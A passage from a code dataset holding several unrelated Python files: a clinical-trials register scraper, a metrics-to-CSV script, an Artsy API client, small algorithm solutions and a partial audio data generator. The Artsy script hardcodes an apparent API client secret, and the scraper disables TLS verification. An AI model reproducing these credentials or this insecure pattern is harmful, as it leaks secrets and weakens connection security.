val[win_cyto:-win_cyto,win_cyto:-win_cyto]\ncyto = cytoplasm_masks[0,win_cyto:-win_cyto,win_cyto:-win_cyto]\nnuc = nuclear_masks[0,win_cyto:-win_cyto,win_cyto:-win_cyto]\n\ndice_jaccard_indices(cyto, val, nuc)","sub_path":"running_convnet_test.py","file_name":"running_convnet_test.py","file_ext":"py","file_size_in_byte":2896,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"430535744","text":"import json\nimport csv\nimport requests\nimport re\nimport pandas as pd\nfrom bs4 import BeautifulSoup\n\nCLINICAL_TRIALS_ROOT_URL = 'https://www.clinicaltrialsregister.eu/ctr-search/search?query=covid-19&country=gb'\nFULL_TRIALS_DOWNLOAD_URL = 'https://www.clinicaltrialsregister.eu/ctr-search/rest/download/full?query=covid-19&country=gb&page={}&mode=current_page'\n\n\ndef find_number_of_pages(ROOT_URL):\n \n root_contents = requests.get(ROOT_URL, verify=False)\n soup = BeautifulSoup(root_contents.content, 'html.parser')\n div_class = soup.find('div', {'class' :'outcome grid_12'}).text\n page_total = re.search(r'Displaying page 1 of (\\d+)', div_class)\n\n TOTAL_PAGES = int(page_total.group(1))\n\n return TOTAL_PAGES\n\n\ndef get_full_trials(DOWNLOAD_URL, TOTAL_PAGES):\n\n # Get full clinical trial info from all pages\n download_full_pages = []\n for i in range(TOTAL_PAGES):\n download_full_pages.append(requests.get(DOWNLOAD_URL.format(i+1), verify=False))\n\n # Merge contents of each page together\n merged_full_download_pages = b''\n for d in download_full_pages:\n merged_full_download_pages += d.content\n with open('data/clinical-trials-full.txt', 'wb') as f:\n f.write(merged_full_download_pages)\n with open('data/clinical-trials-full.txt', encoding=\"utf8\") as f:\n full_trial_data = f.read()\n\n return full_trial_data\n\n\ndef create_list_of_trial_dicts(full_trial_data):\n\n split_full_trial_data = full_trial_data.split('\\nSummary')\n\n # Remove unwanted data\n split_full_trial_data.pop(0)\n\n split_full_trial_data_2 = []\n for trial in split_full_trial_data:\n s = '\\nA.'\n split = [s+e for e in trial.split(s) if e]\n split[0] = split[0][3:]\n split_full_trial_data_2.append(split)\n\n split_full_trial_data_3 = []\n for trial in split_full_trial_data_2:\n s = '\\nB.'\n split = [s+e for e in trial[-1].split(s) if e]\n split[0] = split[0][3:]\n trial = trial[:-1] + 
split\n split_full_trial_data_3.append(trial)\n\n split_full_trial_data_4 = []\n for trial in split_full_trial_data_3:\n s = '\\nD.'\n split = [s+e for e in trial[-1].split(s) if e]\n split[0] = split[0][3:]\n trial = trial[:-1] + split\n split_full_trial_data_4.append(trial)\n\n split_full_trial_data_5 = []\n for trial in split_full_trial_data_4:\n s = '\\nE.'\n split = [s+e for e in trial[-1].split(s) if e]\n split[0] = split[0][3:]\n trial = trial[:-1] + split\n split_full_trial_data_5.append(trial)\n\n split_full_trial_data_6 = []\n for trial in split_full_trial_data_5:\n s = '\\nF.'\n split = [s+e for e in trial[-1].split(s) if e]\n split[0] = split[0][3:]\n trial = trial[:-1] + split\n split_full_trial_data_6.append(trial)\n\n split_full_trial_data_7 = []\n for trial in split_full_trial_data_6:\n s = '\\nG.'\n split = [s+e for e in trial[-1].split(s) if e]\n split[0] = split[0][3:]\n trial = trial[:-1] + split\n split_full_trial_data_7.append(trial)\n\n split_full_trial_data_8 = []\n for trial in split_full_trial_data_7:\n s = '\\nN.'\n split = [s+e for e in trial[-1].split(s) if e]\n split[0] = split[0][3:]\n trial = trial[:-1] + split\n split_full_trial_data_8.append(trial)\n\n split_full_trial_data_9 = []\n for trial in split_full_trial_data_8:\n s = '\\nP.'\n split = [s+e for e in trial[-1].split(s) if e]\n split[0] = split[0][3:]\n trial = trial[:-1] + split\n split_full_trial_data_9.append(trial)\n\n for trial in split_full_trial_data_9:\n for i in range(len(trial)):\n trial[i] = trial[i][1:]\n\n split_full_trial_data_10 = []\n for trial in split_full_trial_data_9:\n s = '\\n'\n split = [e for e in trial[0].split(s) if e]\n trial = split + trial[1:]\n split_full_trial_data_10.append(trial)\n\n indices_B = []\n indices_D_3 = []\n indices_D_8 = []\n for trial in split_full_trial_data_10:\n index_B = [i for i in trial if i.startswith('B.1.1 Name of Sponsor:') \\\n or i.startswith('D. IMP Identification')]\n ind_B = []\n for i in index_B:\n ind_B.append(trial.index(i))\n indices_B.append([index_B, ind_B])\n\n index_D_3 = [i for i in trial if i.startswith('D.IMP:') \\\n or i.startswith('D.8 Information on Placebo')]\n ind_D_3 = []\n for i in index_D_3:\n ind_D_3.append(trial.index(i))\n indices_D_3.append([index_D_3, ind_D_3])\n\n index_D_8 = [i for i in trial if i.startswith('D.8 Placebo:') \\\n or i.startswith('E. 
General Information on the Trial')]\n ind_D_8 = []\n for i in index_D_8:\n ind_D_8.append(trial.index(i))\n indices_D_8.append([index_D_8, ind_D_8])\n\n for i in range(len(split_full_trial_data_10)):\n for j in range(len(indices_B[i][0])):\n if j < len(indices_B[i][0])-1:\n for k in range(indices_B[i][1][j], indices_B[i][1][j+1]):\n split_full_trial_data_10[i][k] = 'B.S{}.'.format(j+1) + split_full_trial_data_10[i][k][2:]\n for j in range(len(indices_D_3[i][0])):\n if j < len(indices_D_3[i][0])-1:\n for k in range(indices_D_3[i][1][j], indices_D_3[i][1][j+1]):\n split_full_trial_data_10[i][k] = 'D.I{}.'.format(j+1) + split_full_trial_data_10[i][k][2:]\n for j in range(len(indices_D_8[i][0])):\n if j < len(indices_D_8[i][0])-1:\n for k in range(indices_D_8[i][1][j], indices_D_8[i][1][j+1]):\n split_full_trial_data_10[i][k] = 'D.P{}.'.format(j+1) + split_full_trial_data_10[i][k][2:]\n\n # Select lines containing colon\n for trial in split_full_trial_data_10:\n trial[:] = [l for l in trial if any(sub in l for sub in [':'])]\n\n # Make key value pairs\n split_full_trial_data_11 = []\n for i in range(len(split_full_trial_data_10)):\n split_full_trial_data_11.append(dict(s.split(':', 1) for s in split_full_trial_data_10[i]))\n\n # Remove all non GB clinical trials\n count = 0\n for i in range(len(split_full_trial_data_11)):\n for k,v in split_full_trial_data_11[i-count].items():\n if k == 'Link' and '/GB/' not in v:\n split_full_trial_data_11.pop(i-count)\n count += 1\n\n # Strip trailing blank space in value\n for trial in split_full_trial_data_11:\n for k,v in trial.items():\n value = trial[k].strip()\n trial[k] = value\n\n return split_full_trial_data_11\n\n\ndef create_key_for_sections(split_full_trial_data):\n\n A_subsets = []\n B_subsets = []\n D_subsets = []\n E_subsets = []\n F_subsets = []\n G_subsets = []\n N_subsets = []\n P_subsets = []\n Summary_subsets = []\n for trial in split_full_trial_data:\n A_subset = {key: value for key, value in trial.items() if key.startswith('A.')}\n A_subsets.append(A_subset)\n B_subset = {key: value for key, value in trial.items() if key.startswith('B.')}\n B_subsets.append(B_subset)\n D_subset = {key: value for key, value in trial.items() if key.startswith('D.')}\n D_subsets.append(D_subset)\n E_subset = {key: value for key, value in trial.items() if key.startswith('E.')}\n E_subsets.append(E_subset)\n F_subset = {key: value for key, value in trial.items() if key.startswith('F.')}\n F_subsets.append(F_subset)\n G_subset = {key: value for key, value in trial.items() if key.startswith('G.')}\n G_subsets.append(G_subset)\n N_subset = {key: value for key, value in trial.items() if key.startswith('N.')}\n N_subsets.append(N_subset)\n P_subset = {key: value for key, value in trial.items() if key.startswith('P.')}\n P_subsets.append(P_subset)\n Summary_subset = {key: value for key, value in trial.items() if not key.startswith('A.') and not key.startswith('B.') \\\n and not key.startswith('D.') and not key.startswith('E.') and not key.startswith('F.') \\\n and not key.startswith('G.') and not key.startswith('N.') and not key.startswith('P.')}\n Summary_subsets.append(Summary_subset)\n\n for i in range(len(A_subsets)):\n A_subsets[i] = {'A. Protocol Information': A_subsets[i]}\n B_subsets[i] = {'B. Sponsor Information': B_subsets[i]}\n D_subsets[i] = {'D. IMP Identification': D_subsets[i]}\n E_subsets[i] = {'E. General Information on the Trial': E_subsets[i]}\n F_subsets[i] = {'F. Population of Trial Subjects': F_subsets[i]}\n G_subsets[i] = {'G. 
Investigator Networks to be involved in the Trial': G_subsets[i]}\n N_subsets[i] = {'N. Review by the Competent Authority or Ethics Committee in the country concerned': N_subsets[i]}\n P_subsets[i] = {'P. End of Trial': P_subsets[i]}\n for i in range(len(A_subsets)):\n A_subsets[i].update(B_subsets[i])\n A_subsets[i].update(D_subsets[i])\n A_subsets[i].update(E_subsets[i])\n A_subsets[i].update(F_subsets[i])\n A_subsets[i].update(G_subsets[i])\n A_subsets[i].update(N_subsets[i])\n A_subsets[i].update(P_subsets[i])\n for i in range(len(Summary_subsets)):\n Summary_subsets[i].update(A_subsets[i])\n\n full_trials_list_dict = Summary_subsets\n\n return full_trials_list_dict\n\n\ndef write_json(data, filename, indent=2):\n with open(filename, 'w') as jsonfile:\n json.dump(data, jsonfile, indent=indent)\n\n\ndef write_csv(list_of_flattened_dicts, csv_file):\n df = pd.DataFrame(list_of_flattened_dicts)\n df.to_csv(csv_file, index = None)\n\n\ndef main():\n\n # Find each trial page and merge contents of txt files\n TOTAL_PAGES = find_number_of_pages(CLINICAL_TRIALS_ROOT_URL)\n full_trial_data = get_full_trials(FULL_TRIALS_DOWNLOAD_URL, TOTAL_PAGES)\n\n # Split trial data and write to json and csv format\n split_full_trial_data = create_list_of_trial_dicts(full_trial_data)\n full_trials_list_dict = create_key_for_sections(split_full_trial_data)\n write_json(full_trials_list_dict, 'data/clinical-trials-full.json')\n write_csv(split_full_trial_data, r'data/clinical-trials-full.csv')\n\n\n\nif __name__ == \"__main__\":\n main()","sub_path":"scripts/clinical-trials-extractor-full.py","file_name":"clinical-trials-extractor-full.py","file_ext":"py","file_size_in_byte":9643,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"605098292","text":"import argparse\nimport os\nimport re\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser()\n parser.add_argument(\"--pre_trained\", type=str, default=\"auto_encoder\", help=\"none | auto_encoder | language_model\")\n parser.add_argument(\"--data_folder\", type=str, default=\"ACL\", help=\"ACL | Markov | huffman_tree | two_tree\")\n parser.add_argument(\"--data_type\", type=str, default=\"news\", help=\"movie | news | tweet\")\n parser.add_argument(\"--unlabeled_data_nums\", nargs='+', type=int, default=[20000, 50000, 100000],\n help=\"how many unlabeled data samples was used in pretrain\")\n parser.add_argument(\"--labeled_data_nums\", nargs='+', type=int, default=[200, 500, 1000, 2000, 4000, 6000, 8000],\n help=\"train data samples for each label\")\n parser.add_argument(\"--labels\", nargs='+', type=int, default=[0, 1], help=\"classes to classify\")\n parser.add_argument(\"--positive_label\", type=int, default=1,\n help=\"which label to be positive samples, -1 for average\")\n parser.add_argument(\"--bi_directional\", type=str, default=\"False\", help=\"whether to use bi-directional LSTM\")\n parser.add_argument(\"--hidden_layers_bi\", type=int, default=2,\n help=\"hidden LSTM layer nums if bi_directional is true\")\n parser.add_argument(\"--num_hidden_bi\", type=int, default=100,\n help=\"hidden LSTM cell nums in each layer if bi_directional is true\")\n args = parser.parse_args()\n args.bi_directional = True if args.bi_directional.lower() in (\"yes\", \"true\", \"t\", \"1\") else False\n\n output_file_path = os.path.join(args.pre_trained, args.data_folder, args.data_type,\n 'bit_'.join([str(x) for x in args.labels]) + 'bit_result')\n if not os.path.exists(output_file_path):\n 
os.makedirs(output_file_path)\n output_file_path = os.path.join(output_file_path,\n '_'.join([str(x) for x in args.unlabeled_data_nums]) + '_unlabeled_' + '_'.join(\n [str(x) for x in args.labeled_data_nums]) + '_labeled_positive_' + str(\n args.positive_label) + ('_bi_' + str(args.hidden_layers_bi) + '_' + str(\n args.num_hidden_bi) if args.bi_directional else '') + '.csv')\n\n result_dict = dict()\n for unlabeled_data_num in args.unlabeled_data_nums:\n result_dict[unlabeled_data_num] = dict()\n pre_dir = os.path.join(args.pre_trained, args.data_folder, args.data_type, str(unlabeled_data_num))\n for train_data_num in args.labeled_data_nums:\n result_dict[unlabeled_data_num][train_data_num] = dict()\n file_path = os.path.join(pre_dir, 'bit_'.join([str(x) for x in args.labels]) + 'bit_' + str(train_data_num))\n if args.bi_directional:\n file_path = os.path.join(file_path,\n 'bi_directional_%d_%d' % (args.hidden_layers_bi, args.num_hidden_bi))\n file_path = os.path.join(file_path, 'accuracy.txt')\n with open(file_path, 'r', encoding='utf8') as f:\n lines = f.read().splitlines()\n i = -1\n last_line = lines[i].strip()\n while last_line == '':\n i = i - 1\n last_line = lines[i].strip()\n precisions = [float(x) for x in\n re.search(r'[^\\[]+$',\n re.search(r'precision:[^\\]]+', last_line).group()).group().strip().split()]\n recalls = [float(x) for x in\n re.search(r'[^\\[]+$', re.search(r'recall:[^\\]]+', last_line).group()).group().strip().split()]\n fscores = [float(x) for x in\n re.search(r'[^\\[]+$', re.search(r'fscore:[^\\]]+', last_line).group()).group().strip().split()]\n accuracies = [float(x) for x in\n re.search(r'[^\\[]+$',\n re.search(r' accuracy:[^\\]]+', last_line).group()).group().strip().split()]\n specificities = [float(x) for x in\n re.search(r'[^\\[]+$',\n re.search(r'specificity:[^\\]]+', last_line).group()).group().strip().split()]\n TP = [round(train_data_num * x) for x in recalls]\n FN = [train_data_num - x for x in TP]\n FP = [round(x / y - x) for (x, y) in zip(TP, precisions)]\n TN = [round(train_data_num * (len(args.labels) - 1) * x) for x in specificities]\n average_precision = sum(TP) / (sum(TP) + sum(FP))\n average_recall = sum(TP) / (sum(TP) + sum(FN))\n average_fscore = 2 * average_precision * average_recall / (average_precision + average_recall)\n average_specificity = sum(TN) / (sum(TN) + sum(FP))\n average_accuracy = (sum(TP) + sum(TN)) / (sum(TP) + sum(TN) + sum(FP) + sum(FN))\n\n precisions.append(sum(precisions) / len(precisions))\n recalls.append(sum(recalls) / len(recalls))\n fscores.append(sum(fscores) / len(fscores))\n accuracies.append(sum(accuracies) / len(accuracies))\n specificities.append(sum(specificities) / len(specificities))\n # precisions.append(average_precision)\n # recalls.append(average_recall)\n # fscores.append(average_recall)\n # accuracies.append(average_accuracy)\n # specificities.append(average_specificity)\n\n all_accuracy = float(re.search(r' .+$', re.search(r'all_accuracy:.+$', last_line).group()).group().strip())\n result_dict[unlabeled_data_num][train_data_num]['precision'] = precisions[args.positive_label]\n result_dict[unlabeled_data_num][train_data_num]['recall'] = recalls[args.positive_label]\n result_dict[unlabeled_data_num][train_data_num]['fscore'] = fscores[args.positive_label]\n result_dict[unlabeled_data_num][train_data_num]['specificity'] = specificities[args.positive_label]\n result_dict[unlabeled_data_num][train_data_num]['accuracy'] = accuracies[args.positive_label]\n 
result_dict[unlabeled_data_num][train_data_num]['all_accuracy'] = all_accuracy\n with open(output_file_path, 'w', encoding='utf8') as f:\n f.write(',')\n for unlabeled_data_num in args.unlabeled_data_nums:\n f.write(',' + str(unlabeled_data_num))\n f.write('\\n')\n for train_data_num in args.labeled_data_nums:\n for content in ['precision', 'recall', 'fscore', 'specificity', 'accuracy', 'all_accuracy']:\n f.write(str(train_data_num) + ',' + content)\n for unlabeled_data_num in args.unlabeled_data_nums:\n f.write(',' + str(result_dict[unlabeled_data_num][train_data_num][content]))\n f.write('\\n')\n","sub_path":"result_to_csv.py","file_name":"result_to_csv.py","file_ext":"py","file_size_in_byte":6942,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"597073816","text":"import requests\nimport json\n\nclient_id = 'db311cfe37ec4bc74a61'\nclient_secret = 'ba1d22427d386b0b79ce4403c063b2ec'\n\nresp = requests.post(\"https://api.artsy.net/api/tokens/xapp_token\", data={\"client_id\" : client_id, \"client_secret\" : client_secret}).text\ntoken = json.loads(resp)[\"token\"]\n\ndef get_json(url):\n headers = {\"X-Xapp-Token\" : token}\n resp = requests.get(url, headers=headers).text\n return json.loads(resp)\n\nans = []\n\nwith open(\"dataset_24476_4.txt\") as inp:\n for id in inp:\n id = id.rstrip()\n js = get_json(\"https://api.artsy.net/api/artists/\" + id)\n ans.append((js[\"birthday\"], js[\"sortable_name\"]))\n\nans.sort(key=lambda x: (int(x[0]), x[1]))\nprint(\"\\n\".join(map(lambda x: x[1], ans)))","sub_path":"python basics and applications/3/3-6/3-6-2.py","file_name":"3-6-2.py","file_ext":"py","file_size_in_byte":730,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"437561462","text":"class Point:\n def __init__(self, x, y):\n self.x = x\n self.y = y\n\ndef solve():\n try:\n while True:\n x1, y1, x2, y2, x3, y3, x4, y4 = read_and_parse()\n if is_convex(Point(x1, y1), Point(x2, y2), Point(x3, y3), Point(x4, y4)):\n print('YES')\n else:\n print('NO')\n except EOFError:\n pass\n\ndef is_convex(p1, p2, p3, p4):\n v13 = [p3.x - p1.x, p3.y - p1.y]\n v12 = [p2.x - p1.x, p2.y - p1.y]\n v14 = [p4.x - p1.x, p4.y - p1.y]\n\n v21 = [p1.x - p2.x, p1.y - p2.y]\n v23 = [p3.x - p2.x, p3.y - p2.y]\n v24 = [p4.x - p2.x, p4.y - p2.y]\n\n if cross(v13, v12) * cross(v13, v14) < 0 and cross(v24, v21) * cross(v24, v23) < 0:\n return True\n else:\n return False\n\ndef cross(v1, v2):\n return v1[0] * v2[1] - v1[1] * v2[0]\n\ndef read_and_parse():\n return list(map(float, input().strip().split(',')))\n\ndef vector(pa, pb):\n return [pb.x - pa.x, pb.y - pa.y]\n\nif __name__ == '__main__':\n solve()\n import doctest\n doctest.testmod()\n","sub_path":"aoj/0000-/0035.py","file_name":"0035.py","file_ext":"py","file_size_in_byte":1056,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"172561485","text":"##############################################\n## Author: I-No Liao ##\n## Date of update: 2018/08/25 ##\n## Description: Leetcode #007 ##\n##############################################\n\n# Given a 32-bit signed integer, reverse digits of an integer.\n# \n# Example 1:\n# \n# Input: 123\n# Output: 321\n# Example 2:\n# \n# Input: -123\n# Output: -321\n# Example 3:\n# \n# Input: 120\n# Output: 21\n\n# I-No\nclass Solution:\n # @param x: int\n # @return int\n def reverse(self, x):\n bound = [-2**31, 2**31-1]\n xStr = str(x)\n if xStr[0] == '-':\n xStr = xStr[1:]\n 
sign = '-'\n else:\n sign = ''\n xStr = xStr[::-1]\n for i in range(len(xStr)):\n if xStr[i] != '0':\n break\n else:\n continue\n ans = int(sign+xStr[i:])\n return ans if bound[0] <= ans <= bound[1] else 0\n\n# I-No\n# More concise\nclass Solution_2:\n # @param x: int\n # @return int\n def reverse(self, x):\n if x < 0:\n y = -int(str(-x)[::-1])\n else:\n y = int(str(x)[::-1])\n return y if -2**31 <= y <= 2**31-1 else 0\n\n# Main\nif __name__ == '__main__':\n print('----- Solution 1 -----')\n print(Solution().reverse(123))\n print(Solution().reverse(-123))\n print(Solution().reverse(1020))\n print(Solution().reverse(1534236469))\n print('----- Solution 2 -----')\n print(Solution_2().reverse(123))\n print(Solution_2().reverse(-123))\n print(Solution_2().reverse(1020))\n print(Solution_2().reverse(1534236469))\n","sub_path":"007_ReverseInteger.py","file_name":"007_ReverseInteger.py","file_ext":"py","file_size_in_byte":1615,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"118104647","text":"import pandas as pd\nimport numpy as np\nimport os\n\n\nclass SkaterbotDataGenerator:\n train_counter = 0\n train_successful = 0\n validation_counter = 0\n validation_succesful = 0\n test_counter = 0\n test_successful = 0\n n_train = 0\n n_validation = 0\n n_test = 0\n n_test_succesful = 0\n n_samples = 0\n max_time_steps = 100\n\n def __init__(self, dataset_dir: str, csv_name: str,\n time_size: int,\n freq_size: int,\n window_size: float,\n transform_type: str,\n train_test_ratio=0.7,\n validation_ratio=0.2,\n distribution_mode=False):\n \"\"\"\n :param dataset_dir: directory of dataset (depending on window_size)\n :param csv_name: csv-file with the list of data-names. Each sample has an extension \"_offset_x.npy\"\n :param time_size: size of time-dimension of input\n :param freq_size: size of frequency-dimension of input\n :param window_size: size of window used in transform\n :param transform_type: transform-type --> (\"spectrogram\", \"melspectrogram\", \"mfcc\", \"cqt\")\n :param train_test_ratio: train-test splitting ratio\n :param validation_ratio: percentage of train samples that will be used as validation-data\n :param distribution_mode: if True, the output label distribution considers neighbour labels\n \"\"\"\n self.__check_ratio(train_test_ratio)\n self.__check_ratio(validation_ratio)\n self.transform_type = self.__check_transform(transform_type, window_size)\n\n self.dataset_dir = dataset_dir\n self.data_dir = os.path.join(dataset_dir, 'data')\n\n self.dataset = self.csv_to_data_list(os.path.join(dataset_dir, csv_name))\n\n self.time_size, self.freq_size, self.window_size = time_size, freq_size, window_size\n\n # Used in classification. 
if True ==> output = correct-label considers neighbour-label\n self.distribution_mode = distribution_mode\n\n self.train_set, self.validation_set, self.test_set = self.__get_train_test_samples(train_test_ratio,\n validation_ratio)\n\n # Main methods to be used.\n def train_flow(self, batch_size: int, regression_mode=False):\n \"\"\"\n :param batch_size: number of samples to be returned\n :param regression_mode: default value False, if True the output samples are float and in_frame.\n :return: x_train, y_train, numpy arrays in proper shapes for CNNs.\n \"\"\"\n self.__initialize_train_set()\n\n while self.train_counter + batch_size < self.n_train:\n x_train, y_train = self.__make_train_batch(batch_size, regression_mode)\n yield x_train, y_train\n\n rest_of_data = self.n_train - self.train_counter\n if 0 < rest_of_data < batch_size:\n x_train, y_train = self.__make_train_batch(rest_of_data, regression_mode)\n\n yield x_train, y_train\n else:\n raise StopIteration\n\n def validation_flow(self, batch_size: int, regression_mode=False):\n \"\"\"\n :param batch_size: number of samples to be returned\n :param regression_mode: default value False, if True the output samples are float and in_frame.\n :return: x_train, y_train, numpy arrays in proper shapes for CNNs.\n \"\"\"\n self.__initialize_validation_set()\n\n while self.validation_counter + batch_size < self.n_validation:\n x_validation, y_validation = self.__make_validation_batch(batch_size, regression_mode)\n yield x_validation, y_validation\n\n rest_of_data = self.n_validation - self.validation_counter\n if 0 < rest_of_data < batch_size:\n x_validation, y_validation = self.__make_validation_batch(rest_of_data, regression_mode)\n\n yield x_validation, y_validation\n else:\n raise StopIteration\n\n def test_flow(self, batch_size: int, regression_mode=False):\n\n self.test_counter = 0\n\n while self.test_counter + batch_size < self.n_test:\n x_test, y_test = self.__make_test_batch(batch_size, regression_mode)\n yield x_test, y_test\n\n rest_of_data = self.n_test - self.test_counter\n if 0 < rest_of_data < batch_size:\n x_test, y_test = self.__make_test_batch(rest_of_data, regression_mode)\n yield x_test, y_test\n else:\n raise StopIteration\n\n def input_flow(self, batch_size: int):\n \"\"\"\n :param batch_size: number of samples to be returned\n :param regression_mode: default value False, if True the output samples are float and in_frame.\n :return: x_train, y_train, numpy arrays in proper shapes for CNNs.\n \"\"\"\n self.__initialize_input_set()\n\n while self.train_counter + batch_size <= self.n_train:\n x_train = self.__make_input_batch(batch_size)\n yield x_train\n\n rest_of_data = self.n_train - self.train_counter\n if 0 < rest_of_data < batch_size:\n x_train = self.__make_input_batch(batch_size)\n yield x_train\n else:\n raise StopIteration\n\n \"\"\" Other methods \"\"\"\n\n @staticmethod\n def csv_to_data_list(csv_path: str):\n df = pd.read_csv(csv_path)\n return df.to_numpy()[:, 1]\n\n def extract_samplename_and_offset(self, offset_filename):\n offset_idx = offset_filename.find('_offset_')\n\n sample_name = offset_filename[:offset_idx]\n\n offset_path = os.path.join(self.data_dir, sample_name, 'offsets', 'time_size_' + str(self.time_size),\n offset_filename)\n start_idx, end_idx = np.load(offset_path)\n\n return sample_name, start_idx, end_idx\n\n def read_input(self, sample_name: str, start_idx: int, end_idx: int):\n sample_path = os.path.join(self.data_dir,\n sample_name,\n 'inputs',\n sample_name + self.transform_type + '.npy')\n 
full_transform = np.load(sample_path)\n if start_idx + self.time_size != end_idx:\n raise Exception('SkaterbotDataGeneratorError: the \"time_size\" given does not match'\n 'with the corresponding of the dataset. \"time_size\"s value should be equal '\n 'to ' + str(end_idx - start_idx) + '.')\n x = self.normalize_input(full_transform[start_idx: end_idx, :])\n return x\n\n def read_raw_output(self, sample_name: str, start_idx, end_idx: int):\n sample_path = os.path.join(self.data_dir, sample_name, 'output_raw', sample_name + '.npy')\n pois = np.load(sample_path)\n for poi in pois:\n start_time = start_idx / (1000 / self.window_size)\n end_time = end_idx / (1000 / self.window_size)\n # If no pois correspond to the current input then the sample should be skipped\n if start_time <= poi < end_time:\n \"\"\" poi - start_time so that output sample is withing the range of \"time_size / (1000 / ws)\" \"\"\"\n return np.array([poi - start_time])\n\n def read_output(self, sample_name: str, start_idx, end_idx: int):\n \"\"\"\n :param sample_name: song_name (wav filename)\n :param start_idx: the sub-transform's starting point\n :param end_idx: the sub-transform's ending point\n :param regression_mode: Default value False, if True the output samples are float and in_frame.\n :return: returns output batch\n \"\"\"\n if self.distribution_mode:\n extention = 'output_distribution'\n else:\n extention = 'output'\n sample_path = os.path.join(self.data_dir, sample_name, extention, sample_name + '.npy')\n full_time_size_vector = np.load(sample_path)\n # If no pois correspond to the current input then the sample should be skipped\n if full_time_size_vector[start_idx: end_idx].any():\n return full_time_size_vector[start_idx: end_idx]\n\n # This way if no pois are found in this frame we can use the empty array to skip this step\n return np.array([])\n\n def normalize_input(self, x: np.ndarray):\n # Since spectrograms are converted to skimages of type uint8, the max value is 255 and the min 0\n max_val = np.amax(x)\n min_val = np.amin(x)\n if max_val > 255 or min_val < 0 or min_val == max_val:\n return np.array([])\n\n normalized_input = (x - min_val) / (max_val - min_val)\n\n return normalized_input\n\n # Private methods\n def __check_transform(self, transform_type, window_size):\n if (transform_type == 'constant-q' or transform_type == 'cqt') and (window_size == 10 or window_size == 100):\n raise Exception(\n 'SkaterbotDataGeneratorError: Cannot have Constant-Q transform with window-size==' + str(window_size))\n return transform_type\n\n def __check_ratio(self, ttr: float):\n if ttr > 1:\n raise Exception('SkaterbotDataGeneratorError: \"train_test_ratio\" should have a value lower than 1.')\n if ttr <= 0:\n raise Exception('SkaterbotDataGeneratorError: \"train_test_ratio\" should have a positive value.')\n\n def __initialize_input_set(self):\n self.train_counter = 0\n\n def __append_input(self, x_batch, x):\n\n if len(x.shape) == 1:\n raise Exception(\n 'SkaterbotDataGenerator: Something went wrong. The input \"x\" that was given had one dimension'\n 'instead of 2 or more.')\n # A transform's shape is 2-dimensional. Thus we add one more dimension to make it image-like. 
(one colour)\n if len(x.shape) == 2:\n x = np.expand_dims(x, axis=-1)\n\n x_batch = np.append(x_batch, np.expand_dims(x, axis=0), axis=0)\n return x_batch\n\n def __initialize_train_set(self):\n self.train_counter = 0\n np.random.shuffle(self.train_set)\n\n def __initialize_validation_set(self):\n self.validation_counter = 0\n\n def __initialize_test_set(self):\n self.test_counter = 0\n\n def __get_empty_batches(self, regression_mode):\n x_train = np.empty((0, self.time_size, self.freq_size, 1))\n if regression_mode:\n y_train = np.empty((0, 1))\n else:\n y_train = np.empty((0, self.time_size))\n return x_train, y_train\n\n def __append_sample(self, x_batch, y_batch, x, y):\n if x.shape != (self.time_size, self.freq_size):\n print('Skipped this sample...')\n return x_batch, y_batch\n else:\n # A transform's shape is 2-dimensional. Thus we add one more dimension to make it image-like. (one colour)\n x = np.expand_dims(x, axis=-1)\n\n x_batch = np.append(x_batch, np.expand_dims(x, axis=0), axis=0)\n y_batch = np.append(y_batch, np.expand_dims(y, axis=0), axis=0)\n return x_batch, y_batch\n\n def __make_train_batch(self, batch_size: int, regression_mode: bool):\n x_train, y_train = self.__get_empty_batches(regression_mode)\n\n i = 0\n while i < batch_size:\n if self.train_counter == self.n_train: # Reached end of dataset\n return np.array([]), np.array([])\n sample_name, start_idx, end_idx = self.extract_samplename_and_offset(\n self.train_set[self.train_counter])\n self.train_counter += 1\n x = self.read_input(sample_name, start_idx, end_idx)\n\n if regression_mode:\n y = self.read_raw_output(sample_name, start_idx, end_idx)\n else:\n y = self.read_output(sample_name, start_idx, end_idx)\n\n x_is_not_ok = self.__check_x(x)\n y_is_not_ok = self.__check_y(y, regression_mode)\n if x_is_not_ok or y_is_not_ok:\n continue\n\n x_train, y_train = self.__append_sample(x_train, y_train, x, y)\n i += 1\n\n return x_train, y_train\n\n def __make_validation_batch(self, batch_size: int, regression_mode: bool):\n x_validation, y_validation = self.__get_empty_batches(regression_mode)\n\n i = 0\n while i < batch_size:\n if self.validation_counter >= self.n_validation:\n return np.array([]), np.array([])\n sample_name, start_idx, end_idx = self.extract_samplename_and_offset(\n self.validation_set[self.validation_counter])\n\n self.validation_counter += 1\n\n x = self.read_input(sample_name, start_idx, end_idx)\n\n if regression_mode:\n y = self.read_raw_output(sample_name, start_idx, end_idx)\n else:\n y = self.read_output(sample_name, start_idx, end_idx)\n\n x_is_not_ok = self.__check_x(x)\n y_is_not_ok = self.__check_y(y, regression_mode)\n if x_is_not_ok or y_is_not_ok:\n continue\n\n x_validation, y_validation = self.__append_sample(x_validation, y_validation, x, y)\n i += 1\n\n return x_validation, y_validation\n\n def __make_test_batch(self, batch_size: int, regression_mode: bool):\n x_test, y_test = self.__get_empty_batches(regression_mode)\n\n i = 0\n while i < batch_size:\n if self.test_counter >= self.n_test: # Reached end of dataset\n return np.array([]), np.array([])\n sample_name, start_idx, end_idx = self.extract_samplename_and_offset(\n self.test_set[self.test_counter])\n self.test_counter += 1\n\n x = self.read_input(sample_name, start_idx, end_idx)\n\n if regression_mode:\n y = self.read_raw_output(sample_name, start_idx, end_idx)\n else:\n y = self.read_output(sample_name, start_idx, end_idx)\n\n x_is_not_ok = self.__check_x(x)\n y_is_not_ok = self.__check_y(y, regression_mode)\n if 
